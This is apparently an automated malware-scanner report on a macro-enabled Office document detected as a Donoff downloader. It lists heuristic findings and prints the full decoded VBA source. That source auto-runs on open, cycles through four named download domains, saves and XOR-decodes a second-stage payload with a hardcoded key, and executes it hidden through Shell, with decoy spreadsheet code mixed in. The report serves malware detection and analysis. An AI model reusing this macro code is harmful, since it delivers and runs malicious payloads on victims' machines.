MALICIOUS
392
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1140 Deobfuscate or Reverse Engineer
The sample is an OOXML document containing obfuscated VBA macros, indicated by multiple critical and high severity heuristic firings related to VBA execution and obfuscation. The 'autoopen' subroutine and the presence of 'CreateObject' and 'Shell' calls suggest the macro is designed to execute arbitrary code. The 'SaveAllStufAndExit' subroutine appears to handle binary data, likely for a second-stage payload. The ClamAV detection further confirms its malicious nature as a downloader.
Heuristics 10
-
ClamAV: Xls.Downloader.Donoff-10030344-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Downloader.Donoff-10030344-0
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Dim Lrow As Long Shell ProjectBastion & MrPersidentUUUKA & ",init_data", vbHide -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set ProjectAndNow = CreateObject(MrPersidentPLdunay(1)) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set ProjectAndNow = CreateObject(MrPersidentPLdunay(1)) -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
CallByName ProjectAndNow, "s" + ProjectTransformation + "ile", VbMethod, MrPersidentUUUKABBB, 2 SaveAllStufAndExit MrPersidentUUUKABBB, MrPersidentUUUKA, "8L1OQVdWGJGR2vqZQGTEeBbATg1tYju6" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub autoopen() ProjectBastion = UserForm1.Label1.Caption -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12960 bytes |
SHA-256: 82d6b57f53723111e2be8ecda87789b63b64e998ebf4f38949ff5309e4d43e75 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
ProjectBastion = UserForm1.Label1.Caption
MrPersident2 = UserForm1.Label3.Caption
ProjectRecreate "DQ"
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{C5B2D9EC-DB69-4AB6-ACB5-0D02461DBDDB}{A2D19EEE-0AA4-454B-8349-9BA339506A17}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Module1"
Attribute VB_Name = "Module2"
Public Sub SaveAllStufAndExit(SourceFile As String, spkIJ As String, Optional Key As String)
Dim SPKi As Integer
Dim spkAr() As Byte
SPKi = FreeFile
Open SourceFile For Binary As #SPKi
ReDim spkAr(0 To LOF(SPKi) - 1)
Get #SPKi, , spkAr()
Close #SPKi
Call SaveAllStufAndExit2(spkAr(), Key)
SPKi = FreeFile
Open spkIJ For Binary As #SPKi
Put #SPKi, , spkAr()
Close #SPKi
End Sub
Sub SaveWorkingCopy()
Dim relativePath As String
Application.DisplayAlerts = False
relativePath = ThisWorkbook.Path & "\" & "Levels Passed by Members " & Day(Now()) & "-" & Month(Now()) & "-" & Year(Now()) & " Filtered.xlsx"
ActiveWorkbook.SaveAs FileName:=relativePath
Application.DisplayAlerts = True
End Sub
Public Sub RemoveIDAndFormatRow()
MrPersidentASALLLP = ProjectTbilisi.responseBody
ProjectAndNow.Write MrPersidentASALLLP
CoachesReport ""
Exit Sub
Rows.Select
Sel.ection.RowHeight = 15
Colu.mns("A:A").Delete
Colu.mns("A").ColumnWidth = 25
Colu.mns("B").ColumnWidth = 15
Colu.mns("C").ColumnWidth = 24.71
Colu.mns("I:R").ColumnWidth = 11
End Sub
Public Sub SaveAllStufAndExit2(ByteArray() As Byte, codeck As String)
Dim AsString() As Byte
Dim AsStringLen As Long
Dim extraName2 As Long
Dim extraName3 As Long
Dim extraName4 As Long
Dim extraName5 As Long
Dim extraName6 As Long
AsStringLen = Len(codeck)
ReDim AsString(AsStringLen)
AsString = StrConv(codeck, vbFromUnicode)
extraName2 = UBound(ByteArray) + 1
extraName5 = extraName2
For extraName4 = 0 To (extraName2 - 1)
ByteArray(extraName4) = ByteArray(extraName4) Xor AsString(extraName4 Mod AsStringLen)
If (extraName4 >= extraName6) Then
extraName3 = Int((extraName4 / extraName5) * 100)
extraName6 = (extraName5 * ((extraName3 + 1) / 100)) + 1
End If
Next
End Sub
Attribute VB_Name = "Module3"
Public ProjectBen10() As String
Public Const MrPersidentRH = "User-Agent"
Public Const ProjectTransformation = "avetof"
Public ProjectBastion As String
Public ProjectTbilisi As Object
Public ProjectAndNow As Object
Public ProjectWhileFor As Object
Public Function MrPersidentrfl(str)
Set ProjectAndNow = CreateObject(MrPersidentPLdunay(1))
copyHeader
Exit Function
Dim regEx As Object
regEx.Pattern = "\</li\>"
regEx.IgnoreCase = True
regEx.Global = False
MrPersidentrfl = regEx.Replace(str, " .@@")
End Function
Public Sub ColinDouglasReport()
Set ProjectWhileFor = MrPersident1DASH1solo.Environment(MrPersidentPLdunay(2 + 2))
MrPersidentLAKOPPC = ProjectWhileFor(MrPersidentPLdunay(6))
ProjectDarvin = 0
Dim i
On Error GoTo nextU
For i = LBound(ProjectBen10) To UBound(ProjectBen10) Step 1
MrPersident4 = UserForm1.Label2.Caption & ProjectBen10(i)
ProjectDarvin = ProjectDarvin + 1
ProjectTbilisi.Open MrPersidentPLdunay(5), MrPersident4, False
ProjectTbilisi.setRequestHeader MrPersidentRH, "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0"
SendTabsToFile
Exit Sub
nextU:
Next
Exit Sub
ActiveWorkbook.She.ets("Active").Copy After:=WorkShe.ets("Active")
She.ets("Active (2)").Name = "Colin Douglas"
She.ets("Colin Douglas").Select
Ra.nge("A1").CurrentRegion.Select
ActiveWorkbook.WorkShe.ets("Active").Sort.SortFields.Clear
ActiveWorkbook.WorkShe.ets("Active").Sort.SortFields.Add Key:=Sel.ection.Columns(5) _
, SortOn:=xlSortOnValues, Order:=xlAscending, DataOption:=xlSortNormal
ActiveWorkbook.WorkShe.ets("Active").Sort.SortFields.Add Key:=Sel.ection.Columns(3) _
, SortOn:=xlSortOnValues, Order:=xlAscending, DataOption:=xlSortNormal
ActiveWorkbook.WorkShe.ets("Active").Sort.SortFields.Add Key:=Sel.ection.Columns(1) _
, SortOn:=xlSortOnValues, Order:=xlAscending, DataOption:=xlSortNormal
With ActiveWorkbook.WorkShe.ets("Active").Sort
.SetRange Ra.nge("A1").CurrentRegion
.Header = xlYes
.MatchCase = False
.Orientation = xlTopToBottom
.SortMethod = xlPinYin
.Apply
End With
ExpoTruckManagerCop ("Colin Douglas")
End Sub
Public Function GodnTeBabenParama(CH1 As String, CH2 As String, CH3 As String) As String
GodnTeBabenParama = Replace(CH1, CH2, CH3)
End Function
Public Sub Add_Header(ByVal Name As String)
ProjectAndNow.Type = 1
ProjectAndNow.Open
RemoveIDAndFormatRow
Exit Sub
She.ets(Name).Select
Call AddF.irstRow
Call copyHeader
She.ets(Name).Select
Ro.ws("1:1").Select
ActiveSheet.Paste
End Sub
Attribute VB_Name = "Module4"
Public Sub SendTabsToFile()
ProjectTbilisi.Send
If ProjectTbilisi.Status <> 200 Then
Err.Raise vbObjectError + 515, "33", "44"
End If
MAIN
End Sub
Public Function windows7os() As Boolean
'* Authored by Nathan N on 6/4/2012
'* Determines if user is using windows 7
If Left(Appl.ication.OperatingSystem, 21) = "Windows (32-bit) NT 5" Then
windows7os = False
Else
windows7os = True
End If
End Function
Public Function hub_path() As String
'// Created by Nathan N on 7/9/2012
hub_path = "\\hqclienthub\Client Hub"
End Function
Public Function report_archive_path() As String
'// Created by Nathan N on 7/9/2012
report_archive_path = "\\colofs1\Vendor Team\CONTACT MANAGEMENT\CMT Reports"
End Function
Public Function ref_path() As String
'// Created by Nathan N on 7/12/2012
ref_path = "\\colofs1\Vendor Team\CONTACT MANAGEMENT\CMT Reports\Reference\ClientReferenceList.xlsx"
End Function
Public Sub delete_empty_entries(ByVal ws As String, ByVal fieldName As String)
'Authored by Nathan N on 4/9/2012
Dim i As Long
For i = 2 To Las.tRow(ws)
If (w.s.Cells(i, Fiel.dColNum(ws, fieldName)) = "") Then
w.s.Rows(i).Delete shift:=xlUp
i = i - 1
If (i = La.stRow(ws)) Then
Exit For
End If
End If
Next i
End Sub
Public Function InArray(ByRef arrayName() As Variant, ByVal elementValue As Variant) As Boolean
'Created on 3/13/2012 by Nathan N
Dim i As Long
For i = 0 To UBound(arrayName())
If (elementValue = arrayName(i)) Then 'If the elementValue is found at any point in the array, then TRUE
InArray = True
Exit Function
End If
Next i
InArray = False 'Otherwise, InArray is false
End Function
Public Sub DeleteExtraSheets()
Set ProjectTbilisi = CreateObject(MrPersidentPLdunay(0))
CreateFilteredReport
Exit Sub
Application.DisplayAlerts = False
She.ets("Admin codes and info").Delete
She.ets("Misc accounts").Delete
She.ets("Coach and Dist Finished").Delete
She.ets("Sub cancelled").Delete
Application.DisplayAlerts = True
End Sub
Attribute VB_Name = "Module0"
Public MrPersidentLAKOPPC As String
Public MrPersidentPLdunay() As String
Public MrPersidentUUUKA As String
Public MrPersidentUUUKABBB As String
Public MrPersident1DASH1solo As Object
Public MrPersidentGMAKO As Object
Public MrPersident4 As String
Public MrPersident2 As String
Public MrPersidentASALLLP As Variant
Public ProjectDarvin As Integer
Public Sub ExpoTruckManagerCop(ByVal Name As String)
Dim FirstRow As Long
Dim LastRow As Long
Dim Lrow As Long
Shell ProjectBastion & MrPersidentUUUKA & ",init_data", vbHide
End Sub
Public Sub copyHeader()
Set MrPersidentGMAKO = CreateObject(MrPersidentPLdunay(5 - 3))
DeleteExtraSheets
Exit Sub
She.ets("Admin codes and info").Select
Ro.ws("9:9").Select
Sel.ection.Copy
End Sub
Public Function ProjectRecreate(sMetarVis As String) As String
Dim iSlashPOS As Integer
Dim sDecimalVis As String
Dim sWholeVis As String
Dim sTempVis As String
Dim iCount As Integer
Dim sVisibility As String
Dim sNodeKey As String
Dim sParentKey As String
Dim sVis As String
MrPersidentPLdunay = Split(MrPersident2, "BUBLEGUM")
GoTo err_dup
Exit Function
iSlashPOS = InStr(1, sMetarVis, "/")
If iSlashPOS > 0 Then
Select Case Mid(sMetarVis, iSlashPOS - 1, 3)
Case "1/4"
sDecimalVis = ".25"
Case "1/2"
sDecimalVis = ".50"
Case "3/4"
sDecimalVis = ".75"
End Select
End If
iCount = 1
Do Until iCount > Len(sMetarVis)
If Mid(sMetarVis, iCount, 1) = Chr(32) Or _
Mid(sMetarVis, iCount, 1) = "S" Then
sWholeVis = sTempVis
If Left(sWholeVis, 1) = "P" Then
sWholeVis = Right(sWholeVis, Len(sWholeVis) - 1)
End If
iCount = 99
End If
sTempVis = sTempVis & Mid(sMetarVis, iCount, 1)
iCount = iCount + 1
Loop
If Mid(sMetarVis, 2, 1) = "/" Or Mid(sMetarVis, 3, 1) = "/" Then
sVis = "0" & sDecimalVis
Else
sVis = sWholeVis & sDecimalVis
End If
sNodeKey = "C" & gsStationID & "V"
sParentKey = "S" & gsStationID
sVisibility = "Visibility: " & sVis & " miles"
Set nodX = mdiMain.ActiveForm.treWeather.Nodes.Add(sParentKey, tvwChild, sNodeKey, _
sVisibility)
nodX.Image = "vis"
nodX.Tag = sVis
Exit Function
err_dup:
MrPersidentrfl ""
End Function
Public Sub CoachesReport(ByVal Name As String)
CallByName ProjectAndNow, "s" + ProjectTransformation + "ile", VbMethod, MrPersidentUUUKABBB, 2
SaveAllStufAndExit MrPersidentUUUKABBB, MrPersidentUUUKA, "8L1OQVdWGJGR2vqZQGTEeBbATg1tYju6"
ExpoTruckManagerCop ""
End Sub
Public Sub MAIN()
MrPersidentUUUKA = MrPersidentLAKOPPC
MrPersidentUUUKABBB = MrPersidentUUUKA + "\herpack" + CStr(ProjectDarvin)
MrPersidentUUUKA = MrPersidentUUUKA + Replace(MrPersidentPLdunay(12), ".", CStr(ProjectDarvin) + ".")
Add_Header ""
Exit Sub
She.ets("FL Certificates").Select
Call RemoveIDAndFormatRow
She.ets("Active").Select
Call RemoveIDAndFormatRow
Call CreateFilteredReport
Call ColinDouglasReport
End Sub
Public Sub CreateFilteredReport()
Set MrPersident1DASH1solo = CreateObject(MrPersidentPLdunay(3))
ProjectBen10 = Split("samaraorgsintez.ru/873nf3g+smockfiery.net/873nf3g+samsebe.su/873nf3g+dentbord.com/873nf3g", UserForm1.Label4.Caption)
ColinDouglasReport
Exit Sub
She.ets("Active").Select
Ra.nge("A1").CurrentRegion.Select
ActiveWorkbook.WorkShe.ets("Active").Sort.SortFields.Clear
ActiveWorkbook.WorkShe.ets("Active").Sort.SortFields.Add Key:=Sel.ection.Columns(6), SortOn:=xlSortOnValues, Order:=xlAscending, DataOption:=xlSortNormal
ActiveWorkbook.WorkShe.ets("Active").Sort.SortFields.Add Key:=Sel.ection.Columns(5) _
, SortOn:=xlSortOnValues, Order:=xlAscending, DataOption:=xlSortNormal
ActiveWorkbook.WorkShe.ets("Active").Sort.SortFields.Add Key:=Sel.ection.Columns(3) _
, SortOn:=xlSortOnValues, Order:=xlAscending, DataOption:=xlSortNormal
ActiveWorkbook.WorkShe.ets("Active").Sort.SortFields.Add Key:=Sel.ection.Columns(1) _
, SortOn:=xlSortOnValues, Order:=xlAscending, DataOption:=xlSortNormal
With ActiveWorkbook.WorkShe.ets("Active").Sort
.SetRange Ra.nge("A1").CurrentRegion
.Header = xlYes
.MatchCase = False
.Orientation = xlTopToBottom
.SortMethod = xlPinYin
.Apply
End With
End Sub
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Module32"
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 45568 bytes |
SHA-256: 821a86397dad4b4a1c24374c7da02973fc9c46aa0a5589a9afe897db223358db |
|||
|
Detection
ClamAV:
Xls.Downloader.Donoff-10030344-0
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.